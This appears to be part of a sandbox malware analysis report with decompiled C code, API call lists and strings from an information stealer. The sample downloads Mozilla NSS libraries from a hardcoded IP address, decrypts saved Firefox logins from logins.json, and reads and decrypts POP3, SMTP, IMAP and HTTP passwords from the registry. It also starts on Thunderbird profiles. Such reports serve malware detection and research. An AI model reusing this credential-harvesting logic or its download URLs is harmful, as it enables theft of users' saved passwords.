0x0040a58f
0x0040a59d
0x0040a5ab
0x0040a5b9
0x0040a5c7
0x0040a5d5
0x0040a5dd
0x0040a5e0
0x0040a5e3
0x0040a5e6
0x0040a5f1
0x0040a5f4
0x0040a5f7
0x0040a5ff
0x0040a615
0x0040a625
0x0040a635
0x0040a645
0x0040a655
0x0040a668
0x0040a673
0x0040a687
0x0040a695
0x0040a6a3
0x0040a6b1
0x0040a6bf
0x0040a6cd
0x0040a6db
0x0040a6e9
0x0040a6f7
0x0040a705
0x0040a713
0x0040a718
0x0040a8bb
0x0040a8bb
0x0040a71e
0x0040a71e
0x0040a721
0x0040a724
0x0040a727
0x0040a72a
0x0040a72f
0x0040a755
0x0040a75a
0x0040a75e
0x0040a77b
0x0040a765
0x0040a770
0x0040a778
0x0040a778
0x0040a781
0x0040a79b
0x0040a79d
0x0040a788
0x0040a793
0x0040a798
0x0040a7a0
0x0040a7a6
0x0040a7c1
0x0040a7ae
0x0040a7b9
0x0040a7be
0x0040a7c4
0x0040a7ca
0x0040a7e5
0x0040a7d2
0x0040a7dd
0x0040a7e2
0x0040a7e8
0x0040a7ee
0x0040a80c
0x0040a80e
0x0040a7f6
0x0040a801
0x0040a806
0x0040a809
0x0040a814
0x0040a832
0x0040a834
0x0040a81c
0x0040a827
0x0040a82c
0x0040a82f
0x0040a837
0x0040a83a
0x0040a83a
0x0040a840
0x00000000
0x0040a856
0x0040a863
0x0040a865
0x0040a868
0x0040a877
0x0040a886
0x0040a895
0x0040a8a4
0x0040a8b3
0x0040a8b3
0x0040a840
0x0040a8c1
0x0040a8c9
0x0040a8d1
0x0040a8d9
0x0040a8e1
0x0040a8e6
0x0040ab04
0x0040ab04
0x0040ab04
0x0040a5ff
0x0040ab09
0x0040ab0f
0x0040ab11
0x0040ab17
0x0040ab2d
0x0040ab40
0x0040ab53
0x0040ab66
0x0040ab79
0x0040ab8c
0x0040ab9f
0x0040abb2
0x0040abba
0x0040abc8
0x0040abd0
0x0040abd0
0x0040abd4
0x0040abdf

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040A53D
InternetCheckConnectionW.WININET(http://www.google.com,00000001,00000000), ref: 0040A5F7
GetTempPathW.KERNEL32(00000100,?), ref: 0040A673
lstrcatW.KERNEL32 ref: 0040A687
GetTempPathW.KERNEL32(00000100,?), ref: 0040A695
lstrcatW.KERNEL32 ref: 0040A6A3
GetTempPathW.KERNEL32(00000100,?), ref: 0040A6B1
lstrcatW.KERNEL32 ref: 0040A6BF
GetTempPathW.KERNEL32(00000100,?), ref: 0040A6CD
lstrcatW.KERNEL32 ref: 0040A6DB
GetTempPathW.KERNEL32(00000100,?), ref: 0040A6E9
lstrcatW.KERNEL32 ref: 0040A6F7
GetTempPathW.KERNEL32(00000100,?), ref: 0040A705
lstrcatW.KERNEL32 ref: 0040A713
LoadLibraryW.KERNEL32(?), ref: 0040A863
LoadLibraryW.KERNEL32(?), ref: 0040A875
LoadLibraryW.KERNEL32(?), ref: 0040A884
LoadLibraryW.KERNEL32(?), ref: 0040A893
LoadLibraryW.KERNEL32(?), ref: 0040A8A2
LoadLibraryW.KERNEL32(?), ref: 0040A8B1
SetCurrentDirectoryW.KERNEL32(004097CE,?,00000104,00000000), ref: 0040A8F1
PathFileExistsW.SHLWAPI(00000001), ref: 0040A9F8
PathFileExistsW.SHLWAPI(00000001), ref: 0040AA54
LoadLibraryW.KERNEL32(?,00000001,?,00000104,00000000), ref: 0040AA95
LoadLibraryW.KERNEL32(00000001,?,00000104,00000000), ref: 0040AAA0
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AAAB
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AAB6
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AAC1
SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040ABC8

Strings

PK11_Authenticate, xrefs: 0040AB3B
vcruntime140.dll, xrefs: 0040A6CF, 0040A98D
msvcr, xrefs: 0040A9BF
PR_GetError, xrefs: 0040ABAD
msvcp120.dll, xrefs: 0040A942
http://5.206.225.104/dll/nss3.dll, xrefs: 0040A658
softokn3.dll, xrefs: 0040A681, 0040A974
http://5.206.225.104/dll/softokn3.dll, xrefs: 0040A608
mozglue.dll, xrefs: 0040A6B3, 0040A95B
NSSBase64_DecodeBuffer, xrefs: 0040AB61
freebl3.dll, xrefs: 0040A6EB
http://5.206.225.104/dll/mozglue.dll, xrefs: 0040A628
msvcr120.dll, xrefs: 0040A929
http://5.206.225.104/dll/freebl3.dll, xrefs: 0040A648
http://5.206.225.104/dll/msvcp140.dll, xrefs: 0040A618
PK11_CheckUserPassword, xrefs: 0040AB74
msvcp, xrefs: 0040A9A6
NSS_Shutdown, xrefs: 0040AB87
NSS_Init, xrefs: 0040AB18
msvcp140.dll, xrefs: 0040A697
PK11_GetInternalKeySlot, xrefs: 0040AB28
.dll, xrefs: 0040A9E0, 0040AA3A
http://www.google.com, xrefs: 0040A5EC
nss3.dll, xrefs: 0040A707, 0040A910
PK11SDR_Decrypt, xrefs: 0040AB4E
http://5.206.225.104/dll/vcruntime140.dll, xrefs: 0040A638
PK11_FreeSlot, xrefs: 0040AB9A

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$Path$Templstrcat$CurrentDirectory$ExistsFile$CheckConnectionInternet
String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$freebl3.dll$http://5.206.225.104/dll/freebl3.dll$http://5.206.225.104/dll/mozglue.dll$http://5.206.225.104/dll/msvcp140.dll$http://5.206.225.104/dll/nss3.dll$http://5.206.225.104/dll/softokn3.dll$http://5.206.225.104/dll/vcruntime140.dll$http://www.google.com$mozglue.dll$msvcp$msvcp120.dll$msvcp140.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll$vcruntime140.dll
API String ID: 3990745656-2353291846
Opcode ID: ae822a008d4d7d3c4d5a453b2d66017ce34ba927ad2ab5bc9673db94ab3fe098
Instruction ID: fedc6cd8f0f478fffef8202fcf4b1e5fd58f8889d7a11bcbece70863cef00a20
Opcode Fuzzy Hash: ae822a008d4d7d3c4d5a453b2d66017ce34ba927ad2ab5bc9673db94ab3fe098
Instruction Fuzzy Hash: B4125E71E00209ABCB14EFA1D981AEEB779FF44304F10817BE506B7290DB789A55CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00408DB8 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00408DB8(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E00401130(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E00401052( &_v292, 0, 0x104);
				E00401052( &_v556, 0, 0x104);
				E00401052( &_v820, 0, 0x104);
				E00401052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E004030C5( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E004030C5( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E004030C5( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E004030C5( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E004030C5( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E00401052( &_v17204, _t124, 0x1000);
					E00409150( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E004030C5( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E00401052( &_v17204, _t130, 0x1000);
					E00409150( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E004030C5( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E00401052( &_v17204, _t136, 0x1000);
					E00409150( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E004030C5( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E00401052( &_v17204, _t142, 0x1000);
					E00409150( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E004030C5( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E00403027( &_v24) > 0) {
					E00401ED8(_t217 - 0x10,  &_v24);
					E00401F0E(_t180);
				}
				E0040138F( &_v24);
				return 1;
			}

0x00408db8
0x00408db8
0x00408dc0
0x00408dca
0x00408dd6
0x00408de0
0x00408de5
0x00408de7
0x00408dea
0x00408df8
0x00408e06
0x00408e16
0x00408e1b
0x00408e21
0x00408e3e
0x00408e4a
0x00408e4a
0x00408e5a
0x00408e64
0x00408e69
0x00408e85
0x00408e91
0x00408e91
0x00408e9c
0x00408ea8
0x00408ead
0x00408ec9
0x00408ed5
0x00408ed5
0x00408ee0
0x00408eec
0x00408ef1
0x00408f0d
0x00408f19
0x00408f19
0x00408f24
0x00408f30
0x00408f35
0x00408f51
0x00408f5d
0x00408f5d
0x00408f68
0x00408f74
0x00408f79
0x00408f91
0x00408f93
0x00408f95
0x00408fa4
0x00408fb8
0x00408fbd
0x00408fca
0x00408fca
0x00408fd5
0x00408fe1
0x00408fe6
0x00408ffe
0x00409000
0x00409002
0x00409011
0x00409025
0x0040902a
0x00409037
0x00409037
0x00409042
0x0040904e
0x00409053
0x0040906b
0x0040906d
0x0040906f
0x0040907e
0x00409092
0x00409097
0x004090a4
0x004090a4
0x004090af
0x004090bb
0x004090c0
0x004090d8
0x004090da
0x004090dc
0x004090eb
0x004090ff
0x00409104
0x00409111
0x00409111
0x00409119
0x00409127
0x00409132
0x00409139
0x00409139
0x00409141
0x0040914d

APIs

RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000), ref: 00408E3A
RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000), ref: 00408E81
RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00408EC5
RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00408F09
RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00408F4D
RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00408F91
RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00408FFE
RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 0040906B
RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 004090D8

Part of subcall function 00409150: GlobalAlloc.KERNEL32(00000040,-00000001,756645FD,?,?,?,00409104,00001000,?,00000000,00001000), ref: 0040916E
Part of subcall function 00409150: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409104), ref: 004091A4
Part of subcall function 00409150: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 004091DB

Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E

Strings

SMTP Password, xrefs: 00408FF8
HTTP Password, xrefs: 00409065
POP3 Server, xrefs: 00408EBF
POP3 User, xrefs: 00408F03
Email, xrefs: 00408E7B
SMTP Server, xrefs: 00408F47
POP3 Password, xrefs: 00408F8B
IMAP Password, xrefs: 004090D2
Account Name, xrefs: 00408E34

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
API String ID: 6593746-2537589853
Opcode ID: 51ed262c980c649d5f1f7c4d1e4fa5b07b3ad9ce00a28fa013fd44f0f5c6cf61
Instruction ID: a7ae0ff5eb382b3b678579d73a9e948d2059b91f5862e921ef1f80bd683fe3a0
Opcode Fuzzy Hash: 51ed262c980c649d5f1f7c4d1e4fa5b07b3ad9ce00a28fa013fd44f0f5c6cf61
Instruction Fuzzy Hash: 16A11EB291011DBADB25EBA1CD45FDF737CAF14744F1000BAB605F61C5EA78AB448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409722 Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 408
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409722(WCHAR* __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				WCHAR* _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				int _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				long _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t164;
				void* _t166;
				int _t191;
				int _t192;
				int _t195;
				int _t209;
				WCHAR* _t217;
				void* _t219;
				int _t223;
				void* _t232;
				void* _t238;
				void* _t244;
				int _t283;
				int _t285;
				char* _t291;
				char* _t325;
				void* _t386;
				WCHAR* _t389;
				intOrPtr _t391;
				WCHAR* _t396;
				int _t397;
				void* _t398;
				void* _t399;
				void* _t400;

				_t400 = __eflags;
				_t389 = __ecx;
				_v32 = __ecx;
				E004033AB( &_v24, L"Profile");
				_t283 = 0;
				E00401052( &_v1224, 0, 0x208);
				_v96 = 0;
				_v92 = 0;
				E00401052( &_v704, 0, 0x104);
				_t399 = _t398 + 0x14;
				_t385 =  &_v704;
				E0040ABE2(L"firefox.exe",  &_v704, _t400);
				_t291 =  &_v44;
				E004033AB(_t291,  &_v704);
				lstrcatW( &_v704, L"\\firefox.exe");
				GetBinaryTypeW( &_v704,  &_v92);
				_t401 = _v92 - 6;
				_t164 =  &_v44;
				if(_v92 != 6) {
					_push(0);
				} else {
					_push(1);
				}
				_push(_t291);
				E004033F3(_t399, _t164);
				_t166 = E0040A50C(_t389, _t401);
				_t402 = _t166;
				if(_t166 == 0) {
					_t393 = _v24;
				} else {
					E00403230( &_a4, _t385, _t402, L"\\Mozilla\\Firefox\\");
					E004033F3( &_v36,  &_a4);
					E00403230( &_v36, _t385, _t402, L"profiles.ini");
					E004031FD( &_v24, E004033AB( &_v40, L"Profile"));
					E004058FB(_v40);
					E00403038( &_v24, _t385, _t402, _t283);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t393 = _v24;
						if(GetPrivateProfileStringW(_v24, L"Path", _t283,  &_v1224, ??, ??) == 0) {
							break;
						}
						_v96 = _v96 + 1;
						E004031FD( &_v24, E004033AB( &_v56, L"Profile"));
						E004058FB(_v56);
						_v56 = _t283;
						E00403038( &_v24, _t385, __eflags, _v96 + 1);
						E004033F3( &_v12,  &_a4);
						E00403230( &_v12, _t385, __eflags,  &_v1224);
						E0040331A( &_v12,  &_v28);
						_t191 =  *((intOrPtr*)(_t389 + 0x60))(_v28);
						__eflags = _t191;
						if(_t191 == 0) {
							_t192 =  *((intOrPtr*)(_t389 + 0x78))();
							_v156 = _t192;
							__eflags = _t192;
							if(_t192 == 0) {
								goto L7;
							} else {
								_t195 =  *((intOrPtr*)(_t389 + 0x74))(_t192, 1, _t283);
								_t399 = _t399 + 0xc;
								__eflags = _t195;
								if(_t195 != 0) {
									goto L7;
								} else {
									E004033F3( &_v20,  &_v12);
									E00403230( &_v20, _t385, __eflags, L"\\logins.json");
									_t386 = 0x1a;
									E0040D51C( &_v16, _t386, __eflags);
									E00403230( &_v16, _t386, __eflags, "\\");
									_t385 = 8;
									E004030FB( &_v16, __eflags, E0040326D( &_v60, _t385, __eflags));
									E004058FB(_v60);
									_v60 = _t283;
									E00403230( &_v16, _t385, __eflags, L".tmp");
									_t396 = _v16;
									_t390 = _v20;
									__eflags = CopyFileW(_v20, _t396, _t283);
									if(__eflags != 0) {
										E004031FD( &_v20,  &_v16);
										_t390 = _v20;
									}
									E0040D9F6( &_v184, __eflags);
									_t325 =  &_v180;
									E004031FD(_t325,  &_v20);
									_push(_t325);
									_t209 = E0040DCBA( &_v184, 0xc0000000);
									_t327 =  &_v184;
									__eflags = _t209;
									if(__eflags != 0) {
										_v52 = _t283;
										_v48 = _t283;
										E0040D965( &_v184, _t385,  &_v52, _v164, _t283);
										_t217 = E00403185( &_v116, "encryptedUsername");
										_t219 = E00402CF2( &_v52,  &_v160);
										_t385 = _t217;
										_t285 = E004089D8(_t219, _t217, __eflags);
										_v120 = _t285;
										E004058FB(_v160);
										_t336 = _v116;
										E004058FB(_v116);
										__eflags = _t285;
										if(_t285 == 0) {
											_t283 = 0;
											__eflags = 0;
										} else {
											_t391 = _v32;
											_t283 = 0;
											__eflags = 0;
											_t397 = _v120;
											do {
												_v112 = 0;
												_v108 = 0;
												_v104 = 0;
												_t232 = E00403185( &_v128, "hostname");
												E00408A11( &_v40, E00402CF2( &_v52,  &_v124), __eflags, _t232, _t397);
												E004058FB(_v124);
												E004058FB(_v128);
												_t238 = E00403185( &_v136, "encryptedUsername");
												E00408A11( &_v88, E00402CF2( &_v52,  &_v132), __eflags, _t238, _t397);
												E004058FB(_v132);
												E004058FB(_v136);
												_t244 = E00403185( &_v144, "encryptedPassword");
												_t385 = E00402CF2( &_v52,  &_v140);
												E00408A11( &_v84, _t246, __eflags, _t244, _t397);
												E004058FB(_v140);
												E004058FB(_v144);
												E00409C70(_t391, __eflags, _v88,  &_v76);
												E00409C70(_t391, __eflags, _v84,  &_v80);
												E004031FD( &_v112, E00402E63( &_v40, __eflags,  &_v64));
												E004058FB(_v64);
												_v64 = 0;
												E004031FD( &_v108, E00402E63(E00403185( &_v148, _v76), __eflags,  &_v68));
												E004058FB(_v68);
												_v68 = 0;
												E004058FB(_v148);
												E004031FD( &_v104, E00402E63(E00403185( &_v152, _v80), __eflags,  &_v72));
												E004058FB(_v72);
												_v72 = 0;
												E004058FB(_v152);
												_t399 = _t399 - 0x10;
												_v100 = 0;
												E00401ED8(_t399,  &_v112);
												E00401F0E(_t391);
												E004058FB(_v76);
												E004058FB(_v80);
												E004058FB(_v84);
												E004058FB(_v88);
												E004058FB(_v40);
												_t336 =  &_v112;
												E0040138F( &_v112);
												_t397 = _t397 - 1;
												__eflags = _t397;
											} while (_t397 != 0);
											_t396 = _v16;
											_t390 = _v20;
										}
										_t223 = PathFileExistsW(_t396);
										__eflags = _t223;
										if(_t223 != 0) {
											E004033F3(_t399,  &_v16);
											E0040DA33(_t336);
										}
										 *((intOrPtr*)(_v32 + 0x7c))(_v156);
										 *((intOrPtr*)(_v32 + 0x64))();
										E00402DFF( &_v52);
										_t327 =  &_v184;
									}
									E0040DA15(_t327, __eflags);
									E004058FB(_t396);
									_v16 = _t283;
									E004058FB(_t390);
									_v20 = _t283;
									E004058FB(_v28);
									E004058FB(_v12);
									_t389 = _v32;
								}
							}
						} else {
							L7:
							E004058FB(_v28);
							E004058FB(_v12);
						}
						_push(_v36);
						_v12 = _t283;
						_push(0x104);
					}
					E0040A4B5(_t389);
					_t283 = 1;
					E004058FB(_v36);
				}
				E004058FB(_v44);
				E004058FB(_t393);
				E004058FB(_a4);
				return _t283;
			}

0x00409722
0x0040972e
0x00409738
0x0040973b
0x00409745
0x0040974f
0x00409759
0x00409763
0x00409768
0x0040976d
0x00409770
0x0040977b
0x00409788
0x0040978b
0x0040979c
0x004097ad
0x004097b3
0x004097b7
0x004097ba
0x00409828
0x004097bc
0x004097bc
0x004097bc
0x004097be
0x004097c2
0x004097c9
0x004097ce
0x004097d0
0x0040982b
0x004097d2
0x004097da
0x004097e6
0x004097f3
0x00409809
0x00409811
0x0040981a
0x0040981f
0x00409822
0x00409c1f
0x00409c1f
0x00409c38
0x00000000
0x00000000
0x0040983f
0x0040984b
0x00409853
0x0040985c
0x0040985f
0x0040986b
0x0040987a
0x00409886
0x0040988e
0x00409892
0x00409894
0x004098ab
0x004098ae
0x004098b4
0x004098b6
0x00000000
0x004098b8
0x004098bc
0x004098bf
0x004098c2
0x004098c4
0x00000000
0x004098c6
0x004098cd
0x004098da
0x004098e1
0x004098e5
0x004098f2
0x004098f9
0x00409906
0x0040990e
0x0040991b
0x0040991e
0x00409923
0x00409926
0x00409932
0x00409934
0x0040993d
0x00409942
0x00409942
0x0040994b
0x00409954
0x0040995a
0x0040995f
0x0040996b
0x00409970
0x00409976
0x00409978
0x00409988
0x0040998c
0x0040998f
0x0040999c
0x004099ad
0x004099b2
0x004099c1
0x004099c3
0x004099c6
0x004099cb
0x004099ce
0x004099d3
0x004099d5
0x00409ba8
0x00409ba8
0x004099db
0x004099db
0x004099de
0x004099de
0x004099e0
0x004099e3
0x004099ec
0x004099ef
0x004099f2
0x004099f5
0x00409a0c
0x00409a16
0x00409a1e
0x00409a2f
0x00409a46
0x00409a50
0x00409a5b
0x00409a6c
0x00409a81
0x00409a86
0x00409a93
0x00409a9e
0x00409aac
0x00409aba
0x00409acf
0x00409ad7
0x00409adf
0x00409afc
0x00409b04
0x00409b0f
0x00409b12
0x00409b34
0x00409b3c
0x00409b47
0x00409b4a
0x00409b4f
0x00409b52
0x00409b5b
0x00409b62
0x00409b6a
0x00409b72
0x00409b7a
0x00409b82
0x00409b8a
0x00409b8f
0x00409b92
0x00409b97
0x00409b97
0x00409b97
0x00409ba0
0x00409ba3
0x00409ba3
0x00409bab
0x00409bb1
0x00409bb3
0x00409bbc
0x00409bc1
0x00409bc6
0x00409bd0
0x00409bd7
0x00409bdd
0x00409be2
0x00409be2
0x00409be8
0x00409bef
0x00409bf6
0x00409bf9
0x00409c01
0x00409c04
0x00409c0c
0x00409c11
0x00409c11
0x004098c4
0x00409896
0x00409896
0x00409899
0x004098a1
0x004098a1
0x00409c14
0x00409c17
0x00409c1a
0x00409c1a
0x00409c40
0x00409c4a
0x00409c4b
0x00409c4b
0x00409c53
0x00409c5a
0x00409c62
0x00409c6d

APIs

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 0040ABE2: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040AC1E
Part of subcall function 0040ABE2: lstrcatW.KERNEL32 ref: 0040AC2C
Part of subcall function 0040ABE2: RegOpenKeyExW.ADVAPI32 ref: 0040AC45
Part of subcall function 0040ABE2: RegQueryValueExW.ADVAPI32(00409247,Path,00000000,?,?,?), ref: 0040AC62
Part of subcall function 0040ABE2: RegCloseKey.ADVAPI32(00409247), ref: 0040AC6B

lstrcatW.KERNEL32 ref: 0040979C
GetBinaryTypeW.KERNEL32 ref: 004097AD
GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00409C30

Strings

encryptedPassword, xrefs: 00409A61
Profile, xrefs: 00409733, 004097F8, 0040983A
\Mozilla\Firefox\, xrefs: 004097D2
Path, xrefs: 00409C2A
.tmp, xrefs: 00409913
\firefox.exe, xrefs: 00409790
\logins.json, xrefs: 004098D2
firefox.exe, xrefs: 00409776
encryptedUsername, xrefs: 00409994, 00409A24
hostname, xrefs: 004099E4
profiles.ini, xrefs: 004097EB

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpylstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValue
String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
API String ID: 201373641-815594582
Opcode ID: 0e62d5b8abd91c5793417efa9fb2dcffee6423e4b2c4e79af15117f7129e08b6
Instruction ID: 0d55a3f652f2fe1f99315aa1a92d08475ee962f08214b0b1392dd0f18bd33d50
Opcode Fuzzy Hash: 0e62d5b8abd91c5793417efa9fb2dcffee6423e4b2c4e79af15117f7129e08b6
Instruction Fuzzy Hash: E2E1D772E00219ABCB04EBA1DD929EEB779EF48305F10407EE406B71D2DE786E45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004091E6 Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004091E6(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E004033AB( &_v24, L"Profile");
				_t279 = 0;
				E00401052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E00401052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0040ABE2(L"thunderbird.exe",  &_v704, _t396);
				E004033AB( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E004033F3(_t395,  &_v44);
				_t289 = _t385;
				if(E0040A190(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E00403230( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E004033F3( &_v36,  &_a4);
					E00403230( &_v36, _t381, __eflags, L"profiles.ini");
					E004031FD( &_v24, E004033AB( &_v40, L"Profile"));
					E004058FB(_v40);
					E00403038( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
